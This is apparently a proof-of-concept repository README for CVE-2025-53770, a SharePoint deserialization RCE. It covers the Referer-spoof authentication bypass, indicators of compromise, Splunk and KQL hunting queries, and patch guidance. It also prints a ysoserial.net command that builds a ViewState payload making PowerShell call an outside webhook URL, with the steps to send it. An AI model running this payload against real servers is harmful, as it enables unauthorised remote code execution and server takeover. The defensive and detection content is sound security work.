CVE-2025-53770 PoC — Microsoft SharePoint Server Remote Code Execution Vulnerability

Source

Associated Vulnerability

Description

Exploit & research for CVE‑2025‑53770 – a zero‑day remote code execution vulnerability in Microsoft SharePoint (on‑premises).

Readme

# CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers

## Overview
In mid‑July 2025, Microsoft disclosed **CVE‑2025‑53770**, a **zero‑day remote code execution** vulnerability in **on‑premises SharePoint**. This flaw, when chained with **CVE‑2025‑53771**, enables **unauthenticated attackers** to fully compromise vulnerable servers over the internet. 

The exploitation campaign, dubbed **"ToolShell"**, has been observed **actively targeting governments, energy, education, and telecom sectors worldwide**. If you run **SharePoint Server (2016/2019/Subscription)** and expose it to the internet, you need to **patch now**.

### Impact at a glance
- **Attack Vector:** Remote, unauthenticated  
- **Impact:** Full RCE (IIS worker context)  
- **Exploitation:** Active (confirmed by MS + CISA)  
- **Ease:** Exploitable with a single HTTP POST  

---

## Vulnerability Details

The issue lies in **unsafe deserialization** of crafted `__VIEWSTATE` data in the **ToolPane.aspx** component. When combined with a **referer spoof** (CVE‑2025‑53771), attackers can reach this endpoint **without authentication**, feed it a malicious payload, and gain **remote code execution** as the **w3wp.exe** (IIS worker) process.

### The attack chain:
1. **Authentication bypass**: Use `Referer: /_layouts/SignOut.aspx` to bypass security checks on `/layouts/15/ToolPane.aspx?DisplayMode=Edit`.
2. **Malicious ViewState**: Send a **signed or forged ViewState** payload containing serialized gadget chains (crafted via tools like **ysoserial.net**).
3. **RCE**: SharePoint deserializes the payload and executes attacker‑controlled code.
4. **Persistence**: Attackers drop a web shell (e.g., `spinstall0.aspx`) and steal **machine keys** for future signed payload generation.

### Visualized:
```
[ Attacker ]
     |
     v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
     |
     v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
     |
     v
[ RCE: Attacker code runs as w3wp.exe ]
```

---

## Why It Matters

- **No authentication required**: Works from the internet if the server is exposed.  
- **Full takeover**: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.  
- **Exploited in the wild**: Microsoft, CISA, and Rapid7 have confirmed **active exploitation** in multiple regions.  

---

## Affected Versions

- **SharePoint Server 2016** (before KB5002760)  
- **SharePoint Server 2019** (before KB5002754)  
- **SharePoint Subscription Edition** (before KB5002768)  

(**SharePoint Online is not affected**.)

---

## Indicators of Compromise

- Requests to:  
  ```
  /_layouts/15/ToolPane.aspx?DisplayMode=Edit
  ```
  with `Referer: /_layouts/SignOut.aspx`.
- Dropped files:  
  ```
  spinstall0.aspx
  spinstall1.aspx
  ```
- Suspicious process chains:  
  ```
  w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
  ```
- Known attacker IPs:  
  ```
  107.191.58.76, 104.238.159.149, 96.9.125.147
  ```

---

## Detection & Hunting

### Splunk (IIS Logs)
```spl
index=iis sourcetype="ms:iis:auto" 
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time
```

### KQL (Microsoft Sentinel)
```kql
W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, userAgent, TimeGenerated
```

---

## Proof‑of‑Concept (Python)

A Python PoC is provided to test for CVE‑2025‑53770.

- **[exploit.py](exploit.py)**

### Generating a payload:

To test whether the target processes ViewState and executes commands, you can generate a callback payload with `ysoserial.net`.  
This example makes a PowerShell web request to a [Webhook.site](https://webhook.site) URL you control:

```bash 
ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c powershell -c "iwr 'https://webhook.site/3a5dbeec-f481-4515-b827-52c69a41b4d8'"
 > payload.txt
```
Then replace `__VIEWSTATE` with the contents of payload.txt.

---

## Mitigation & Hardening

1. **Patch immediately**:
    - [KB5002768](https://support.microsoft.com/help/5002768) (Subscription Edition)
    - [KB5002754](https://support.microsoft.com/help/5002754) (2019)
    - [KB5002760](https://support.microsoft.com/help/5002760) (2016)
2. **Rotate machine keys** (twice): Update the `machineKey` in `web.config` to invalidate stolen signing keys.
3. **Restrict access** to `/layouts/15/ToolPane.aspx` to **internal networks only**.
4. **Enable IIS request filtering** to block oversized or suspicious ViewState payloads.
5. **Enable Defender AV + AMSI integration** for real‑time scanning of SharePoint components.
6. **Hunt for compromise**: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.

---

## Key Takeaways

- CVE‑2025‑53770 is being actively exploited.  
- The attack is trivial once discovered (POST + spoofed Referer).  
- Patching alone is not enough — **rotate machine keys** to invalidate stolen ViewState signing keys.  
- Monitor for **web shells** (`spinstall0.aspx`, etc.) and suspicious ToolPane.aspx requests.  

---

**References**:  
- [Microsoft MSRC](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/)  
- [Rapid7 Blog](https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-microsoft-sharepoint-servers-cve-2025-53770/)  
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)  

File Snapshot

 [4.0K]  /data/pocs/9e5190b77619a60a797ee122e109aebbd4ff8c59
├── [1.3K]  exploit.py
└── [5.6K]  README.md

1 directory, 2 files

Remarks